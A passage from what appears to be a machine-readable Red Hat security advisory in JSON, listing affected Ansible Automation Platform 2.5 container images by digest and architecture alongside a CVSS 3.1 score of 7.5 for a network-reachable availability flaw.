"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
